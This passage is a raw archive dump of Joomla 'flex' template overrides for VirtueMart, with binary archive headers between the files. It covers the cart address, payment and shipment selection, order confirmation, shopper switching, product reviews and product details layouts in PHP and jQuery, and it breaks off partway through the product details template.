	jQuery(this).vm2front('startVmLoading');
	jQuery(this).attr('disabled', 'true');
	jQuery(this).removeClass( 'vm-button-correct' );
	jQuery(this).addClass( 'vm-button' );
	jQuery(this).fadeIn( 400 );
	var name = jQuery(this).attr('name');
	var div = '<input name=\"'+name+'\" value=\"1\" type=\"hidden\">';

	jQuery('#checkoutForm').append(div);
	//Virtuemart.updForm();
	jQuery('#checkoutForm').submit();
}
jQuery(document).ready(function($) {
	jQuery(this).vm2front('stopVmLoading');
	var el = jQuery('#checkoutFormSubmit');
	el.unbind('click dblclick');
	el.on('click dblclick',Virtuemart.bCheckoutButton);
});
	");

if( !VmConfig::get('oncheckout_ajax',false)) {
	vmJsApi::addJScript('vm.STisBT',"
		jQuery(document).ready(function($) {

			if ( $('#STsameAsBTjs').is(':checked') ) {
				$('#output-shipto-display').hide();
			} else {
				$('#output-shipto-display').show();
			}
			$('#STsameAsBTjs').click(function(event) {
				if($(this).is(':checked')){
					$('#STsameAsBT').val('1') ;
					$('#output-shipto-display').hide();
				} else {
					$('#STsameAsBT').val('0') ;
					$('#output-shipto-display').show();
				}
				var form = jQuery('#checkoutFormSubmit');
				form.submit();
			});
		});
	");
}

$this->addCheckRequiredJs();
?><div style="display:none;" id="cart-js">
<?php echo vmJsApi::writeJS(); ?>
</div>
</div><br class="row hidden-sm hidden-md hidden-lg" />PK!όvW��1flex/html/com_virtuemart/cart/default_address.phpnu&1i�<?php
/**
*
* Layout for the shopping cart and the mail
* shows the chosen adresses of the shopper
* taken from the cart in the session
*
* @package	VirtueMart
* @subpackage Cart
* @author Max Milbers
*
* @link http://www.virtuemart.net
* @copyright Copyright (c) 2004 - 2014 VirtueMart Team. All rights reserved.
* @license http://www.gnu.org/copyleft/gpl.html GNU/GPL, see LICENSE.php
* VirtueMart is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it includes or
* is derivative of works licensed under the GNU General Public License or
* other free or open source software licenses.
*
*/

// Check to ensure this file is included in Joomla!
defined('_JEXEC') or die('Restricted access');
?>
<div style="padding:0 0 40px;margin:0 auto;border:none;" class="billto-shipto row-fluid">
	<div class="col-xs-12 col-sm-6 mobile-centered">
		<h6>
			<i class="fa fa-home"></i> 
			<?php echo JText::_ ('COM_VIRTUEMART_USER_FORM_BILLTO_LBL'); ?></span>
			<?php // Output Bill To Address ?>
		</h6>

		<div class="output-billto">	<?php 
			$cartfieldNames = array();
			foreach( $this->userFieldsCart['fields'] as $fields){
				$cartfieldNames[] = $fields['name'];
			}

			foreach ($this->cart->BTaddress['fields'] as $item) {
				if(in_array($item['name'],$cartfieldNames)) continue;
				if (!empty($item['value'])) {
					if ($item['name'] === 'agreed') {
						$item['value'] = ($item['value'] === 0) ? vmText::_ ('COM_VIRTUEMART_USER_FORM_BILLTO_TOS_NO') : vmText::_ ('COM_VIRTUEMART_USER_FORM_BILLTO_TOS_YES');
					}
					?><!-- span class="titles"><?php echo $item['title'] ?></span -->
			<span class="values vm2<?php echo '-' . $item['name'] ?>"><?php echo $item['value'] ?></span>
			<?php if ($item['name'] != 'title' and $item['name'] != 'first_name' and $item['name'] != 'middle_name' and $item['name'] != 'zip') { ?>
				<br class="clear"/>
			<?php
			}
			}
			} ?>
			<div class="clear"></div>
		</div>

		<?php
		if($this->pointAddress){
			$this->pointAddress = 'required invalid';
		}

		?>
        
		<a class="btn sppb-btn-default centered <?php echo $this->pointAddress ?>" href="<?php echo JRoute::_ ('index.php?option=com_virtuemart&view=user&task=editaddresscart&addrtype=BT', $this->useXHTML, $this->useSSL) ?>" rel="nofollow">
			<?php echo vmText::_ ('COM_VIRTUEMART_USER_FORM_EDIT_BILLTO_LBL'); ?>
		</a>

		<input type="hidden" name="billto" value="<?php echo $this->cart->lists['billTo']; ?>"/>
	</div>
	<div class="col-xs-12 col-sm-6 mobile-centered">
    <br class="row hidden-sm hidden-md hidden-lg" />
		<h6>
			<i class="fa fa-truck"></i> 
			<?php echo JText::_ ('COM_VIRTUEMART_USER_FORM_SHIPTO_LBL'); ?></span>
			<?php // Output Bill To Address ?>
		</h6>
		<div class="output-shipto">
			<?php
			if (!class_exists ('VmHtml')) {
				require(VMPATH_ADMIN . DS . 'helpers' . DS . 'html.php');
			}
			if($this->cart->user->virtuemart_user_id==0){

				echo vmText::_ ('COM_VIRTUEMART_USER_FORM_ST_SAME_AS_BT');
				echo VmHtml::checkbox ('STsameAsBT', $this->cart->STsameAsBT,1,0,'id="STsameAsBTjs" data-dynamic-update=1') . '<br />';
			} else if(!empty($this->cart->lists['shipTo'])){
				echo $this->cart->lists['shipTo'];
			}

			if(empty($this->cart->STsameAsBT) and !empty($this->cart->ST) and !empty($this->cart->STaddress['fields'])){ ?>
				<div id="output-shipto-display">
					<?php
					foreach ($this->cart->STaddress['fields'] as $item) {
						if (!empty($item['value'])) {
							?>
							<!-- <span class="titles"><?php echo $item['title'] ?></span> -->
							<?php
							if ($item['name'] == 'first_name' || $item['name'] == 'middle_name' || $item['name'] == 'zip') {
								?>
								<span class="values<?php echo '-' . $item['name'] ?>"><?php echo $item['value'] ?></span>
							<?php } else { ?>
								<span class="values"><?php echo $item['value'] ?></span>
								<div class="clear"></div>
							<?php
							}
						}
					}
					?>
				</div>
			<?php
			}
			?>
			<div class="clear"></div>
		</div>
		<?php if (!isset($this->cart->lists['current_id'])) {
			$this->cart->lists['current_id'] = 0;

		} ?>
		<a class="btn sppb-btn-default centered" href="<?php echo JRoute::_ ('index.php?option=com_virtuemart&view=user&task=editaddresscart&addrtype=ST&virtuemart_user_id[]=' . $this->cart->lists['current_id'], $this->useXHTML, $this->useSSL) ?>" rel="nofollow">
			<?php echo vmText::_ ('COM_VIRTUEMART_USER_FORM_ADD_SHIPTO_LBL'); ?>
		</a>

	</div>

	<div class="clear"></div>
</div>PK!-�m//0flex/html/com_virtuemart/cart/select_payment.phpnu&1i�<?php
/**
 *
 * Layout for the payment selection
 *
 * @package	VirtueMart
 * @subpackage Cart
 * @author Max Milbers
 *
 * @link http://www.virtuemart.net
 * @copyright Copyright (c) 2004 - 2010 VirtueMart Team. All rights reserved.
 * @license http://www.gnu.org/copyleft/gpl.html GNU/GPL, see LICENSE.php
 * VirtueMart is free software. This version may have been modified pursuant
 * to the GNU General Public License, and as distributed it includes or
 * is derivative of works licensed under the GNU General Public License or
 * other free or open source software licenses.
 * @version $Id: select_payment.php 9042 2015-11-05 12:22:08Z StefanSTS $
 */
// Check to ensure this file is included in Joomla!
defined('_JEXEC') or die('Restricted access');
$addClass="";


if (VmConfig::get('oncheckout_show_steps', 1)) {
	echo '<div class="checkoutStep" id="checkoutStep3">' . vmText::_('COM_VIRTUEMART_USER_FORM_CART_STEP3') . '</div>';
}

if ($this->layoutName!=$this->cart->layout) {
	$headerLevel = 1;
	if($this->cart->getInCheckOut()){
		$buttonclass = 'button vm-button-correct';
	} else {
		$buttonclass = 'default';
	}
	?>
	<form method="post" id="paymentForm" name="choosePaymentRate" action="<?php echo JRoute::_('index.php'); ?>" class="form-validate <?php echo $addClass ?>">
<?php } else {
	$headerLevel = 3;
	$buttonclass = 'vm-button-correct';
}

if($this->cart->virtuemart_paymentmethod_id){
	//echo '<h'.$headerLevel.' class="vm-payment-header-selected">'.vmText::_('COM_VIRTUEMART_CART_SELECTED_PAYMENT_SELECT').'</h'.$headerLevel.'>';
	echo '<h5>'.vmText::_ ('COM_VIRTUEMART_CART_SELECTED_PAYMENT_SELECT').'</h5>';
	echo '<div style="margin-top:25px;" class="clear"></div><hr /><div style="margin-top:35px;" class="clear"></div>';
} else {
	echo '<h'.$headerLevel.' class="vm-payment-header-select">'.vmText::_('COM_VIRTUEMART_CART_SELECT_PAYMENT').'</h'.$headerLevel.'>';
} ?>



<?php
if ($this->found_payment_method ) {

	echo '<div class="select_vm_wrap">';
	if (VmConfig::get('oncheckout_opc') == 0) {
		echo '<div class="col-md-offset-2 col-sm-8 col-md-offset-2">';
	}
	echo '<fieldset class="vm-payment-shipment-select vm-payment-select vm-select">';
	foreach ($this->paymentplugins_payments as $paymentplugin_payments) {
		if (is_array($paymentplugin_payments)) {
			foreach ($paymentplugin_payments as $paymentplugin_payment) {
				echo '<div class="vm-payment-plugin-single">'.$paymentplugin_payment.'</div>';
			}
		}
	}
	echo '</fieldset>';
	if (VmConfig::get('oncheckout_opc') == 0) {
		echo '</div>';
	}
	echo '</div>';

} else {
	echo '<h2>'.$this->payment_not_found_text.'</h2>';
}
?>  
	<div class="control-buttons">
		<?php
		$dynUpdate = '';
		if( VmConfig::get('oncheckout_ajax',false)) {
			$dynUpdate=' data-dynamic-update="1" ';
		 } ?>
         
         <?php if ((VmConfig::get('oncheckout_opc') == 0) || (VmConfig::get('oncheckout_ajax') == false)) { ?>
         <div style="height:5px;" class="clear"></div><hr style="margin:0 auto 20px;" />
		<button style="margin-left:5px;margin-right:5px;" name="updatecart" class="vm-button-correct" type="submit" <?php echo $dynUpdate ?> ><?php echo vmText::_('COM_VIRTUEMART_SAVE'); ?></button>
        <?php } ?>
        
        
		<?php if ($this->layoutName!=$this->cart->layout) { ?>
			<button style="padding:6px 17px;" class="<?php echo $buttonclass ?>" type="reset" onClick="window.location.href='<?php echo JRoute::_('index.php?option=com_virtuemart&view=cart&task=cancel'); ?>'" ><?php echo vmText::_('COM_VIRTUEMART_CANCEL'); ?></button>
		<?php } ?>
	</div>
   <div class="clear"></div>
<?php if ($this->layoutName!=$this->cart->layout) { ?>
	<input type="hidden" name="option" value="com_virtuemart" />
	<input type="hidden" name="view" value="cart" />
	<input type="hidden" name="task" value="updatecart" />
	<input type="hidden" name="controller" value="cart" />
	</form>
<?php } ?>
	PK!{%8	ll,flex/html/com_virtuemart/cart/order_done.phpnu&1i�<?php
defined('_JEXEC') or die('');

/**
*
* Template for the shopping cart
*
* @package	VirtueMart
* @subpackage Cart
* @author Max Milbers
*
* @link http://www.virtuemart.net
* @copyright Copyright (c) 2004 - 2010 VirtueMart Team. All rights reserved.
* @license http://www.gnu.org/copyleft/gpl.html GNU/GPL, see LICENSE.php
* VirtueMart is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it includes or
* is derivative of works licensed under the GNU General Public License or
* other free or open source software licenses.
*/
echo '<div class="vm-wrap vm-order-done centered">';

if (vRequest::getBool('display_title',true)) {
	echo '<h2>'.vmText::_('COM_VIRTUEMART_CART_ORDERDONE_THANK_YOU').'</h2>';
}
echo '<hr /><p style="text-align:center;background-color:transparent;border:0;">';
$this->html = vRequest::get('html', vmText::_('COM_VIRTUEMART_ORDER_PROCESSED') );
echo $this->html;
echo '</p>';

if (vRequest::getBool('display_loginform',true)) {
	$cuser = JFactory::getUser();
	if (!$cuser->guest) echo shopFunctionsF::getLoginForm();
}
echo '</div>';

PK!�%Gx1flex/html/com_virtuemart/cart/select_shipment.phpnu&1i�<?php
/**
 *
 * Template for the shipment selection
 *
 * @package	VirtueMart
 * @subpackage Cart
 * @author Max Milbers
 *
 * @link http://www.virtuemart.net
 * @copyright Copyright (c) 2004 - 2010 VirtueMart Team. All rights reserved.
 * @license http://www.gnu.org/copyleft/gpl.html GNU/GPL, see LICENSE.php
 * VirtueMart is free software. This version may have been modified pursuant
 * to the GNU General Public License, and as distributed it includes or
 * is derivative of works licensed under the GNU General Public License or
 * other free or open source software licenses.
 * @version $Id: cart.php 2400 2010-05-11 19:30:47Z milbo $
 */
// Check to ensure this file is included in Joomla!
defined('_JEXEC') or die('Restricted access');


if (VmConfig::get('oncheckout_show_steps', 1)) {
	echo '<div class="checkoutStep" id="checkoutStep2">' . vmText::_('COM_VIRTUEMART_USER_FORM_CART_STEP2') . '</div>';
}

if ($this->layoutName!=$this->cart->layout) {
$headerLevel = 1;
if($this->cart->getInCheckOut()){
	$buttonclass = 'button vm-button-correct';
} else {
	$buttonclass = 'default';
}
?>
<form method="post" id="shipmentForm" name="chooseShipmentRate" action="<?php echo JRoute::_('index.php'); ?>" class="form-validate">
	<?php
	} else {
		$headerLevel = 3;
		$buttonclass = 'vm-button-correct';
	}

	if($this->cart->virtuemart_shipmentmethod_id){
		
		echo '<h5>'.vmText::_('COM_VIRTUEMART_CART_SELECTED_SHIPMENT_SELECT').'</h5>';
		echo '<div style="margin-top:25px;" class="clear"></div><hr /><div style="margin-top:35px;" class="clear"></div>';
		
	} else {
		echo '<h'.$headerLevel.' class="vm-shipment-header-select">'.vmText::_('COM_VIRTUEMART_CART_SELECT_SHIPMENT').'</h'.$headerLevel.'>';
	}

	if ($this->found_shipment_method ) {
		echo '<div class="select_vm_wrap">';
		if (VmConfig::get('oncheckout_opc') == 0) {
			echo '<div class="col-md-offset-2 col-sm-8 col-md-offset-2">';
		}
		echo '<fieldset class="vm-payment-shipment-select vm-shipment-select vm-select">';
		// if only one Shipment , should be checked by default
		foreach ($this->shipments_shipment_rates as $shipment_shipment_rates) {
			if (is_array($shipment_shipment_rates)) {
				foreach ($shipment_shipment_rates as $shipment_shipment_rate) {
					echo '<div class="vm-shipment-plugin-single">'.$shipment_shipment_rate.'</div>';
				}
			}
		}
		echo '</fieldset>';
		if (VmConfig::get('oncheckout_opc') == 0) {
			echo '</div>';
		}
		echo '</div>';
		//echo '<div style="margin-top:35px;" class="clear"></div><hr />';
	} else {
		echo '<h'.$headerLevel.'>'.$this->shipment_not_found_text.'</h'.$headerLevel.'>';
	}
	?>
  
 	<div class="control-buttons">
		<?php
		$dynUpdate = '';
		if( VmConfig::get('oncheckout_ajax',false)) {
			$dynUpdate=' data-dynamic-update="1" ';
		 } ?>
         
          <?php if ((VmConfig::get('oncheckout_opc') == 0) || (VmConfig::get('oncheckout_ajax') == false)) { ?>
         <div style="height:5px;" class="clear"></div><hr style="margin:0 auto 20px;" />
		<button style="margin-left:5px;margin-right:5px;" name="updatecart" class="vm-button-correct" type="submit" <?php echo $dynUpdate ?> ><?php echo vmText::_('COM_VIRTUEMART_SAVE'); ?></button>
        <?php } ?>
        
		<?php if ($this->layoutName!=$this->cart->layout) { ?> 
			<button style="padding:6px 17px;" class="<?php echo $buttonclass ?>" type="reset" onClick="window.location.href='<?php echo JRoute::_('index.php?option=com_virtuemart&view=cart&task=cancel'); ?>'" ><?php echo vmText::_('COM_VIRTUEMART_CANCEL'); ?></button>
		<?php  } ?>
	</div>

<?php if ($this->layoutName!=$this->cart->layout) { ?> 
    <input type="hidden" name="option" value="com_virtuemart" />
	<input type="hidden" name="view" value="cart" />
	<input type="hidden" name="task" value="updatecart" />
	<input type="hidden" name="controller" value="cart" />
</form>
<?php
}
?>

PK!Қ����5flex/html/com_virtuemart/cart/default_shopperform.phpnu&1i�<?php
/**
 *
 * Layout for the shopper form to change the current shopper
 *
 * @package	VirtueMart
 * @subpackage Cart
 * @author Maik K�nnemann
 *
 * @link http://www.virtuemart.net
 * @copyright Copyright (c) 2004 - 2013 VirtueMart Team. All rights reserved.
 * @license http://www.gnu.org/copyleft/gpl.html GNU/GPL, see LICENSE.php
 * VirtueMart is free software. This version may have been modified pursuant
 * to the GNU General Public License, and as distributed it includes or
 * is derivative of works licensed under the GNU General Public License or
 * other free or open source software licenses.
 * @version $Id: cart.php 2458 2013-07-16 18:23:28Z kkmediaproduction $
 */
// Check to ensure this file is included in Joomla!
defined('_JEXEC') or die('Restricted access');
?>
<hr style="margin:20px auto 30px;" />
<h4 style="margin:20px 0 0;"><?php echo vmText::_ ('COM_VIRTUEMART_CART_CHANGE_SHOPPER'); ?></h4>
<form action="<?php echo JRoute::_ ('index.php'); ?>" method="post" class="form-inline" style="margin:0;">
			<div class="form-group">
				<input class="form-control" type="text" name="usersearch" size="20" maxlength="50" placeholder="<?php echo vmText::_('COM_VIRTUEMART_SEARCH'); ?>...">
                <input class="form-control btn btn-primary" type="submit" name="searchShopper" title="<?php echo vmText::_('COM_VIRTUEMART_SEARCH'); ?>" value="<?php echo vmText::_('COM_VIRTUEMART_SEARCH'); ?>" class="button" />
			</div>
        	<div class="form-group" style="margin:22px 0 0;">
				<?php 
				if (!class_exists ('VirtueMartModelUser')) {
					require(VMPATH_ADMIN . DS . 'models' . DS . 'user.php');
				}

				$currentUser = $this->cart->user->virtuemart_user_id;
				echo JHtml::_('Select.genericlist', $this->userList, 'userID', 'class="vm-chzn-select" style="width:170px;"', 'id', 'displayedName', $currentUser,'userIDcart');
				?>
			
				<input type="submit" name="changeShopper" title="<?php echo vmText::_('COM_VIRTUEMART_SAVE'); ?>" value="<?php echo vmText::_('COM_VIRTUEMART_SAVE'); ?>" class="form-control btn btn-primary" style="margin-top:10px;" />
				<input type="hidden" name="view" value="cart"/>
				<input type="hidden" name="task" value="changeShopper"/>
			</div>
    
    
			<div class="row clearfix">
				<?php if($this->adminID && $currentUser != $this->adminID) { ?>
					<hr /><b class="centered"><?php echo vmText::_('COM_VIRTUEMART_CART_ACTIVE_ADMIN') .' '.JFactory::getUser($this->adminID)->name; ?></b><hr />
				<?php } ?>
				<?php echo JHtml::_( 'form.token' ); ?>
			</div>
		
	
</form>
<div class="clear"></div>
<h4 style="margin:30px 0 0;"><?php echo vmText::_ ('COM_VIRTUEMART_CART_CHANGE_SHOPPERGROUP'); ?></h4>

<form action="<?php echo JRoute::_ ('index.php?option=com_virtuemart&view=cart'); ?>" method="post" class="form-inline" style="margin:0;">
        <div class="form-group" style="margin:22px 0 0;">
            <?php 
            if ($this->shopperGroupList) {
                echo $this->shopperGroupList;
            }
            ?>
        </div>
        <div class="form-group">
            <input type="submit" name="changeShopperGroup" title="<?php echo vmText::_('COM_VIRTUEMART_SAVE'); ?>" value="<?php echo vmText::_('COM_VIRTUEMART_SAVE'); ?>" class="form-control button" />
            <input type="hidden" name="view" value="cart"/>
            <input type="hidden" name="task" value="changeShopperGroup"/>
            <?php echo JHtml::_( 'form.token' ); ?>
        </div>
        <?php if (JFactory::getSession()->get('tempShopperGroups', FALSE, 'vm')) { ?>
        <div class="form-group">
            <input type="reset" title="<?php echo vmText::_('COM_VIRTUEMART_RESET'); ?>" value="<?php echo vmText::_('COM_VIRTUEMART_RESET'); ?>" class="form-control btn btn-dark" onclick="window.location.href='<?php echo JRoute::_ ('index.php?option=com_virtuemart&view=cart&task=resetShopperGroup'); ?>'"/>
        </div>
        <?php } ?>
</form>
<hr style="margin:30px auto;" />
PK!�I"";flex/html/com_virtuemart/productdetails/default_reviews.phpnu&1i�<?php
/**
 *
 * Show the product details page
 *
 * @package    VirtueMart
 * @subpackage
 * @author Max Milbers, Valerie Isaksen
 * @link http://www.virtuemart.net
 * @copyright Copyright (c) 2004 - 2010 VirtueMart Team. All rights reserved.
 * @license http://www.gnu.org/copyleft/gpl.html GNU/GPL, see LICENSE.php
 * VirtueMart is free software. This version may have been modified pursuant
 * to the GNU General Public License, and as distributed it includes or
 * is derivative of works licensed under the GNU General Public License or
 * other free or open source software licenses.
 * @version $Id: default_reviews.php 8508 2014-10-22 18:57:14Z Milbo $
 */

// Check to ensure this file is included in Joomla!
defined ('_JEXEC') or die ('Restricted access');

// Customer Reviews
$review_editable = true;
if ($this->allowRating || $this->allowReview || $this->showRating || $this->showReview) {

	$maxrating = VmConfig::get( 'vm_maximum_rating_scale', 5 );
	$ratingsShow = VmConfig::get( 'vm_num_ratings_show', 3 ); // TODO add  vm_num_ratings_show in vmConfig
	$stars = array();
	$showall = vRequest::getBool( 'showall', FALSE );
	$ratingWidth = $maxrating*16;
	for( $num = 0; $num<=$maxrating; $num++ ) {
		$stars[] = '
				<span title="'.(vmText::_( "COM_VIRTUEMART_RATING_TITLE" ) . ': '.$num.'/'.$maxrating).'" class="vmicon ratingbox" style="display:inline-block;width:'. 16*$maxrating.'px;" data-toggle="tooltip">
					<span class="stars-orange" style="width:'.(16*$num).'px">
					</span>
				</span>';
	}

	echo '<div class="customer-reviews">';

	if ($this->rating_reviews) {
		foreach( $this->rating_reviews as $review ) {
			/* Check if user already commented */
			// if ($review->virtuemart_userid == $this->user->id ) {
			if ($review->created_by == $this->user->id && !$review->review_editable) {
				$review_editable = false;
			}
		}
	}
}

if ($this->allowRating or $this->allowReview) {



	if ($review_editable) {
		?>

		<form method="post"
			  action="<?php echo JRoute::_( 'index.php?option=com_virtuemart&view=productdetails&virtuemart_product_id='.$this->product->virtuemart_product_id.'&virtuemart_category_id='.$this->product->virtuemart_category_id, FALSE ); ?>"
			  name="reviewForm" id="reviewform">

			<?php if($this->allowRating and $review_editable) { ?>

				<h4 style="margin-bottom:35px;"><?php echo vmText::_( 'COM_VIRTUEMART_WRITE_REVIEW' );
					if(count( $this->rating_reviews ) == 0) {
						?> <small> (<?php echo vmText::_( 'COM_VIRTUEMART_WRITE_FIRST_REVIEW' ) ?>) </small><?php
					} ?>
				</h4>
				<span style="margin:0 auto;"><?php echo vmText::_( 'COM_VIRTUEMART_RATING_FIRST_RATE' ) ?></span>
                
				<div class="rating">
					<label for="vote"><?php echo $stars[$maxrating]; ?></label>
					<input type="hidden" id="vote" value="<?php echo $maxrating ?>" name="vote">
				</div>

				<?php

				$reviewJavascript = "
				jQuery(function($) {
					var steps = ".$maxrating.";
					var parentPos= $('.rating .ratingbox').position();
					var boxWidth = $('.rating .ratingbox').width();// nbr of total pixels
					var starSize = (boxWidth/steps);
					var ratingboxPos= $('.rating .ratingbox').offset();
		
					jQuery('.rating .ratingbox').mousemove( function(e){
						var span = jQuery(this).children();
						var dif = e.pageX-ratingboxPos.left; // nbr of pixels
						difRatio = Math.floor(dif/boxWidth* steps )+1; //step
						span.width(difRatio*starSize);
						$('#vote').val(difRatio);
						//console.log('note = ',parentPos, boxWidth, ratingboxPos);
					});
				});
				";
				vmJsApi::addJScript( 'rating_stars', $reviewJavascript );

			}

			// Writing A Review
			if ($this->allowReview and $review_editable) {
			?>
			<div class="write-reviews">

				<?php // Show Review Length While Your Are Writing
				$reviewJavascript = "
				function check_reviewform() {
				
				var form = document.getElementById('reviewform');
				var ausgewaehlt = false;
				
					if (form.comment.value.length < ".VmConfig::get( 'reviews_minimum_comment_length', 100 ).") {
						alert('".addslashes( vmText::sprintf( 'COM_VIRTUEMART_REVIEW_ERR_COMMENT1_JS', VmConfig::get( 'reviews_minimum_comment_length', 100 ) ) )."');
						return false;
					}
					else if (form.comment.value.length > ".VmConfig::get( 'reviews_maximum_comment_length', 2000 ).") {
						alert('".addslashes( vmText::sprintf( 'COM_VIRTUEMART_REVIEW_ERR_COMMENT2_JS', VmConfig::get( 'reviews_maximum_comment_length', 2000 ) ) )."');
						return false;
					}
					else {
						return true;
					}
				}
				
				function refresh_counter() {
					var form = document.getElementById('reviewform');
					form.counter.value= form.comment.value.length;
				}
				";
				vmJsApi::addJScript( 'check_reviewform', $reviewJavascript ); ?>
				<small class="step"><?php echo vmText::sprintf( 'COM_VIRTUEMART_REVIEW_COMMENT', VmConfig::get( 'reviews_minimum_comment_length', 100 ), VmConfig::get( 'reviews_maximum_comment_length', 2000 ) ); ?></small>
				<div class="clear"></div>
                <textarea class="form-control" rows="4" title="<?php echo vmText::_( 'COM_VIRTUEMART_WRITE_REVIEW' ) ?>"
						  id="comment" onblur="refresh_counter();" onfocus="refresh_counter();"
						  onkeyup="refresh_counter();" name="comment" rows="5"
						  cols="60"><?php if(!empty($this->review->comment)) {
						echo $this->review->comment;
					} ?></textarea>
				<div class="clear"></div>
                
                <div class="pull-right" style="margin-top:10px;">
				<small><?php echo vmText::_( 'COM_VIRTUEMART_REVIEW_COUNT' ) ?> 
			     <input style="display:inline;max-width:70px;" type="text" value="0" size="1" name="counter" maxlength="4" readonly/>
				</small>
                </div>
				<?php
				}

				if($review_editable and $this->allowReview) {
					?>
					
					<input class="btn btn-readmore" type="submit" onclick="return( check_reviewform());"
						   name="submit_review" title="<?php echo vmText::_( 'COM_VIRTUEMART_REVIEW_SUBMIT' ) ?>"
						   value="<?php echo vmText::_( 'COM_VIRTUEMART_REVIEW_SUBMIT' ) ?>"/>
				<?php } else if($review_editable and $this->allowRating) { ?>
					<input class="btn btn-readmore" type="submit" name="submit_review"
						   value="<?php echo vmText::_( 'COM_VIRTUEMART_REVIEW_SUBMIT' ) ?>"/>
				<?php
				}

				?>    </div>
			<input type="hidden" name="virtuemart_product_id"
				   value="<?php echo $this->product->virtuemart_product_id; ?>"/>
			<input type="hidden" name="option" value="com_virtuemart"/>
			<input type="hidden" name="virtuemart_category_id"
				   value="<?php echo vRequest::getInt( 'virtuemart_category_id' ); ?>"/>
			<input type="hidden" name="virtuemart_rating_review_id" value="0"/>
			<input type="hidden" name="task" value="review"/>
             <?php if ($this->allowReview) { ?>
            	<input type="hidden" name="published" value="1" />
            <?php } ?>
		</form>
	<?php
	} else if(!$review_editable) {
		echo '<strong>'.vmText::_( 'COM_VIRTUEMART_DEAR' ).$this->user->name.', </strong>';
		echo vmText::_( 'COM_VIRTUEMART_REVIEW_ALREADYDONE' ) . '<br /><br />';
	}
}


if ($this->showReview) {

	?>
	<h4><?php echo vmText::_ ('COM_VIRTUEMART_REVIEWS') ?></h4>

	<div class="list-reviews">
		<?php
		$i = 0;
		//$review_editable = TRUE;
		$reviews_published = 0;
		if ($this->rating_reviews) {
			foreach ($this->rating_reviews as $review) {
				if ($i % 2 == 0) {
					$color = 'normal';
				} else {
					$color = 'highlight';
				}


				?>

				<?php // Loop through all reviews
				if (!empty($this->rating_reviews) && $review->published) {
					$reviews_published++;
					?>
					<div class="<?php echo $color ?>">
						<span class="date"><?php echo JHtml::date ($review->created_on, vmText::_ ('DATE_FORMAT_LC')); ?></span>
						<span class="vote"><?php echo $stars[(int)$review->review_rating] ?></span>
						<blockquote><?php echo $review->comment; ?></blockquote>
						<span class="bold"><?php echo $review->customer ?></span>
					</div>
					<?php
				}
				$i++;
				if ($i == $ratingsShow && !$this->showall) {
					/* Show all reviews ? */
					if ($reviews_published >= $ratingsShow) {
						$attribute = array('class'=> 'details', 'title'=> vmText::_ ('COM_VIRTUEMART_MORE_REVIEWS'));
						echo JHtml::link ($this->more_reviews, vmText::_ ('COM_VIRTUEMART_MORE_REVIEWS'), $attribute);
					}
					break;
				}
			}

		} else {
			// "There are no reviews for this product"
			?>
			<span class="step"><?php echo vmText::_ ('COM_VIRTUEMART_NO_REVIEWS') ?></span>
			<?php
		}  ?>
		<div class="clear"></div>
	</div>
<?php
}

if ($this->allowRating || $this->allowReview || $this->showRating || $this->showReview) {
	echo '</div> ';
}
?>
PK!�WqEflex/html/com_virtuemart/productdetails/default_images_additional.phpnu&1i�<?php
/**
 *
 * Show the product details page
 *
 * @package	VirtueMart
 * @subpackage
 * @author Max Milbers, Valerie Isaksen

 * @link http://www.virtuemart.net
 * @copyright Copyright (c) 2004 - 2010 VirtueMart Team. All rights reserved.
 * @license http://www.gnu.org/copyleft/gpl.html GNU/GPL, see LICENSE.php
 * VirtueMart is free software. This version may have been modified pursuant
 * to the GNU General Public License, and as distributed it includes or
 * is derivative of works licensed under the GNU General Public License or
 * other free or open source software licenses.
 * @version $Id: default_images.php 7784 2014-03-25 00:18:44Z Milbo $
 */
// Check to ensure this file is included in Joomla!
defined('_JEXEC') or die('Restricted access');
?>
<div class="additional-images col-sm-12">
	<?php
	$start_image = VmConfig::get('add_img_main', 1) ? 0 : 1;
	for ($i = $start_image; $i < count($this->product->images); $i++) {
		$image = $this->product->images[$i];
		$cols = count($this->product->images) - 1;
		?>
			<?php
			if(VmConfig::get('add_img_main', 1)) {
				echo $image->displayMediaThumb('class="product-image" style="cursor: pointer"',false,$image->file_description);
				echo '<a href="'. $image->file_url .'"  class="product-image image-'. $i .'" style="display:none;" title="'. $image->file_meta .'" rel="vm-additional-images"></a>';
			} else {
				if (count($this->product->images) < 6) {
					echo '<div class="cols cols-'.$cols.'">';
					echo $image->displayMediaThumb("",true,"rel='vm-additional-images'",true,$image->file_description);
					echo '</div>';
				} else {
					echo '<div class="cols cols-3">';
					echo $image->displayMediaThumb("",true,"rel='vm-additional-images'",true,$image->file_description);
					echo '</div>';
				}
			}
			?>
	<?php
	}
	?>
	
</div>

PK!�m�<�<3flex/html/com_virtuemart/productdetails/default.phpnu&1i�<?php
/**
 *
 * Show the product details page
 *
 * @package	VirtueMart
 * @subpackage
 * @author Max Milbers, Eugen Stranz, Max Galt
 * @link http://www.virtuemart.net
 * @copyright Copyright (c) 2004 - 2014 VirtueMart Team. All rights reserved.
 * @license http://www.gnu.org/copyleft/gpl.html GNU/GPL, see LICENSE.php
 * VirtueMart is free software. This version may have been modified pursuant
 * to the GNU General Public License, and as distributed it includes or
 * is derivative of works licensed under the GNU General Public License or
 * other free or open source software licenses.
 * @version $Id: default.php 9292 2016-09-19 08:07:15Z Milbo $
 */
// Check to ensure this file is included in Joomla!
defined('_JEXEC') or die('Restricted access');

/* Let's see if we found the product */
if (empty($this->product)) {
	echo vmText::_('COM_VIRTUEMART_PRODUCT_NOT_FOUND');
	echo '<br /><br />  ' . $this->continue_link_html;
	return;
}

echo shopFunctionsF::renderVmSubLayout('askrecomjs',array('product'=>$this->product));



if(vRequest::getInt('print',false)){ ?>
<body onload="javascript:print();">
<?php } ?>
<div class="product-container productdetails-view productdetails">

    <div class="vm-product-wrap row">
		<div class="vm-product-media-img col-sm-5">
			<?php
			echo $this->loadTemplate('images');

			$count_images = count ($this->product->images);
			if ($count_images > 1) {
				echo $this->loadTemplate('images_additional');
			}
			
			?>
		</div> <!--/.col-sm-5-->

		<div class="vm-product-details-inner col-sm-7">
			<div class="vm-product-title">
				<div class="pull-left">
					<?php // Product Title   ?>
				    <h2><?php echo $this->product->product_name ?></h2>
				    <?php // Product Title END   ?>
				</div> 
                <div class="vm-rating pull-left">
                
                <?php if (VmConfig::get('display_stock', 1)) { ?>
					<?php if ($this->product->product_in_stock > 0) { ?>
                        <div class="product-in-stock">
                            <i class="pe pe-7s-check"></i>
